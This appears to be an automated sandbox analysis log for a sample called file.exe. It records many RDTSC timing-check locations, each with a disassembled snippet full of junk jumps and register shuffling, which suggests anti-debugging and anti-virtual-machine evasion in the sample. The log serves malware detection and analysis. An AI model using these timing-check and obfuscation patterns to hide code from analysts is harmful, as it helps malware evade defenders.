Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE088D second address: 4EE08A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE08A1 second address: 4EE08CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007FD0F8E1A7ADh 0x0000000c jmp 00007FD0F8E1A7ABh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 ror eax, cl 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE08CC second address: 4EE08D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE08D0 second address: 4EE08D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE08D6 second address: 4EE08DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE08DC second address: 4EE0942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD0F8E1A7AEh 0x00000010 sbb eax, 1D00E6F8h 0x00000016 jmp 00007FD0F8E1A7ABh 0x0000001b popfd 0x0000001c call 00007FD0F8E1A7B8h 0x00000021 movzx eax, dx 0x00000024 pop ebx 0x00000025 popad 0x00000026 retn 0004h 0x00000029 nop 0x0000002a mov esi, eax 0x0000002c lea eax, dword ptr [ebp-08h] 0x0000002f xor esi, dword ptr [00552014h] 0x00000035 push eax 0x00000036 push eax 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b push eax 0x0000003c call 00007FD0FD7EB00Dh 0x00000041 push FFFFFFFEh 0x00000043 jmp 00007FD0F8E1A7AAh 0x00000048 pop eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FD0F8E1A7AAh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE0942 second address: 4EE0948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE0948 second address: 4EE09C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 and cl, FFFFFFE8h 0x0000000c jmp 00007FD0F8E1A7ABh 0x00000011 popfd 0x00000012 push eax 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 ret 0x00000018 nop 0x00000019 push eax 0x0000001a call 00007FD0FD7EB04Ch 0x0000001f mov edi, edi 0x00000021 pushad 0x00000022 push ecx 0x00000023 pushfd 0x00000024 jmp 00007FD0F8E1A7B7h 0x00000029 xor ecx, 0A21DADEh 0x0000002f jmp 00007FD0F8E1A7B9h 0x00000034 popfd 0x00000035 pop esi 0x00000036 movsx ebx, si 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FD0F8E1A7B2h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE09C5 second address: 4EE09C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE09C9 second address: 4EE09CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE09CF second address: 4EE09D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, BD23h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE09D8 second address: 4EE09EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8E1A7ABh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EE09EE second address: 4EE0A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD0F8CDABEFh 0x0000000a adc cx, 3AFEh 0x0000000f jmp 00007FD0F8CDABF9h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 call 00007FD0F8CDABECh 0x0000001d jmp 00007FD0F8CDABF2h 0x00000022 pop ecx 0x00000023 pushfd 0x00000024 jmp 00007FD0F8CDABEBh 0x00000029 sub ecx, 790F15BEh 0x0000002f jmp 00007FD0F8CDABF9h 0x00000034 popfd 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov bh, 4Bh 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90019 second address: 4E9003E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9003E second address: 4E900AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8CDABF1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov si, 0D73h 0x00000015 pushfd 0x00000016 jmp 00007FD0F8CDABF8h 0x0000001b sub ah, 00000078h 0x0000001e jmp 00007FD0F8CDABEBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD0F8CDABF0h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E900AA second address: 4E900B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E900B0 second address: 4E90144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8CDABECh 0x00000009 adc ah, 00000008h 0x0000000c jmp 00007FD0F8CDABEBh 0x00000011 popfd 0x00000012 movzx ecx, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 and esp, FFFFFFF8h 0x0000001b jmp 00007FD0F8CDABEBh 0x00000020 xchg eax, ecx 0x00000021 pushad 0x00000022 movzx esi, di 0x00000025 pushfd 0x00000026 jmp 00007FD0F8CDABF1h 0x0000002b add ah, FFFFFFD6h 0x0000002e jmp 00007FD0F8CDABF1h 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov ebx, esi 0x0000003b pushfd 0x0000003c jmp 00007FD0F8CDABF6h 0x00000041 jmp 00007FD0F8CDABF5h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90144 second address: 4E901B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007FD0F8E1A7B8h 0x0000000c sbb cx, 52B8h 0x00000011 jmp 00007FD0F8E1A7ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ecx 0x0000001b jmp 00007FD0F8E1A7B6h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov si, bx 0x00000027 call 00007FD0F8E1A7B9h 0x0000002c pop esi 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E901B0 second address: 4E901F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD0F8CDABECh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD0F8CDABEBh 0x0000000f sub esi, 1C129F3Eh 0x00000015 jmp 00007FD0F8CDABF9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E901F6 second address: 4E901FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E901FA second address: 4E90200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90200 second address: 4E90214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90214 second address: 4E90236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABF6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90236 second address: 4E9026F instructions: 0x00000000 rdtsc 0x00000002 mov ah, E6h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebx, dword ptr [ebp+10h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f pushfd 0x00000010 jmp 00007FD0F8E1A7B2h 0x00000015 jmp 00007FD0F8E1A7B5h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9026F second address: 4E902A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8CDABF8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E902A1 second address: 4E902A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E902A7 second address: 4E902DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8CDABEBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0F8CDABF5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E902DD second address: 4E902E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E902E3 second address: 4E902E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E902E7 second address: 4E902EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E902EB second address: 4E9030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0F8CDABF2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9030A second address: 4E90341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FD0F8E1A7B6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0F8E1A7AEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90341 second address: 4E90368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABF5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90368 second address: 4E903AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov ax, 2ED3h 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 je 00007FD16B418A33h 0x0000001a jmp 00007FD0F8E1A7ABh 0x0000001f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov edx, 0984C896h 0x0000002e mov cx, di 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E903AC second address: 4E903BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABEFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E903BF second address: 4E903EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD16B4189F3h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E903EA second address: 4E903EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E903EE second address: 4E903F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E903F4 second address: 4E90480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8CDABF0h 0x00000009 add cl, 00000048h 0x0000000c jmp 00007FD0F8CDABEBh 0x00000011 popfd 0x00000012 jmp 00007FD0F8CDABF8h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edx, dword ptr [esi+44h] 0x0000001d jmp 00007FD0F8CDABF0h 0x00000022 or edx, dword ptr [ebp+0Ch] 0x00000025 pushad 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FD0F8CDABECh 0x0000002d sub si, 4708h 0x00000032 jmp 00007FD0F8CDABEBh 0x00000037 popfd 0x00000038 mov ebx, eax 0x0000003a popad 0x0000003b mov cl, 6Eh 0x0000003d popad 0x0000003e test edx, 61000000h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FD0F8CDABEAh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80756 second address: 4E8075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8075C second address: 4E80760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80760 second address: 4E80780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8E1A7B5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80780 second address: 4E8082C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD0F8CDABECh 0x00000011 xor cx, 9FD8h 0x00000016 jmp 00007FD0F8CDABEBh 0x0000001b popfd 0x0000001c pushad 0x0000001d mov bl, ah 0x0000001f pushfd 0x00000020 jmp 00007FD0F8CDABEBh 0x00000025 add cl, FFFFFF9Eh 0x00000028 jmp 00007FD0F8CDABF9h 0x0000002d popfd 0x0000002e popad 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 pushad 0x00000033 mov al, B2h 0x00000035 pushfd 0x00000036 jmp 00007FD0F8CDABF9h 0x0000003b xor si, 9386h 0x00000040 jmp 00007FD0F8CDABF1h 0x00000045 popfd 0x00000046 popad 0x00000047 and esp, FFFFFFF8h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FD0F8CDABEDh 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8082C second address: 4E808FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e mov cx, FE0Fh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov esi, edx 0x00000017 mov ax, dx 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c jmp 00007FD0F8E1A7B9h 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 mov edi, eax 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 mov esi, edi 0x0000002a pushfd 0x0000002b jmp 00007FD0F8E1A7B7h 0x00000030 and ecx, 677BC2DEh 0x00000036 jmp 00007FD0F8E1A7B9h 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f call 00007FD0F8E1A7B3h 0x00000044 pushfd 0x00000045 jmp 00007FD0F8E1A7B8h 0x0000004a add ecx, 45BFFD38h 0x00000050 jmp 00007FD0F8E1A7ABh 0x00000055 popfd 0x00000056 pop esi 0x00000057 popad 0x00000058 mov esi, dword ptr [ebp+08h] 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e movzx eax, di 0x00000061 mov dl, 18h 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E808FD second address: 4E80923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FD0F8CDABF4h 0x00000012 pop eax 0x00000013 mov si, di 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80923 second address: 4E8093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8093A second address: 4E80975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FD0F8CDABF3h 0x00000015 pop esi 0x00000016 mov ch, dh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80975 second address: 4E8097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8097B second address: 4E8097F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8097F second address: 4E809B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD16B4201ADh 0x0000000e pushad 0x0000000f mov dl, BEh 0x00000011 mov ch, CDh 0x00000013 popad 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b jmp 00007FD0F8E1A7B3h 0x00000020 mov ecx, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E809B5 second address: 4E809B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E809B9 second address: 4E809D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E809D4 second address: 4E80A74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 054Ah 0x00000007 jmp 00007FD0F8CDABEBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FD16B2E05A0h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FD0F8CDABF4h 0x0000001c sbb ax, 1038h 0x00000021 jmp 00007FD0F8CDABEBh 0x00000026 popfd 0x00000027 jmp 00007FD0F8CDABF8h 0x0000002c popad 0x0000002d test byte ptr [77516968h], 00000002h 0x00000034 pushad 0x00000035 mov bl, al 0x00000037 pushad 0x00000038 mov eax, edx 0x0000003a mov esi, ebx 0x0000003c popad 0x0000003d popad 0x0000003e jne 00007FD16B2E055Ch 0x00000044 pushad 0x00000045 mov si, bx 0x00000048 mov ebx, 371E640Ch 0x0000004d popad 0x0000004e mov edx, dword ptr [ebp+0Ch] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 movzx eax, di 0x00000057 call 00007FD0F8CDABF9h 0x0000005c pop eax 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80A74 second address: 4E80ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov dx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD0F8E1A7B7h 0x00000016 xor cl, FFFFFFCEh 0x00000019 jmp 00007FD0F8E1A7B9h 0x0000001e popfd 0x0000001f mov ah, BCh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80ABC second address: 4E80AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80AC2 second address: 4E80AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80AC6 second address: 4E80B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD0F8CDABF1h 0x00000013 or cx, 2866h 0x00000018 jmp 00007FD0F8CDABF1h 0x0000001d popfd 0x0000001e movzx esi, di 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD0F8CDABF6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80B28 second address: 4E80B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007FD0F8E1A7ACh 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80B4E second address: 4E80B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push dword ptr [ebp+14h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop ebx 0x0000000e movzx eax, bx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80B60 second address: 4E80BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8E1A7B2h 0x00000009 adc si, 1F28h 0x0000000e jmp 00007FD0F8E1A7ABh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FD0F8E1A7B8h 0x0000001a or ecx, 10CD5188h 0x00000020 jmp 00007FD0F8E1A7ABh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push dword ptr [ebp+10h] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FD0F8E1A7B5h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80C38 second address: 4E80C65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8CDABEDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80C65 second address: 4E80C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ABh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80C7C second address: 4E80C82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E80C82 second address: 4E80C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7188C2 second address: 7188C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
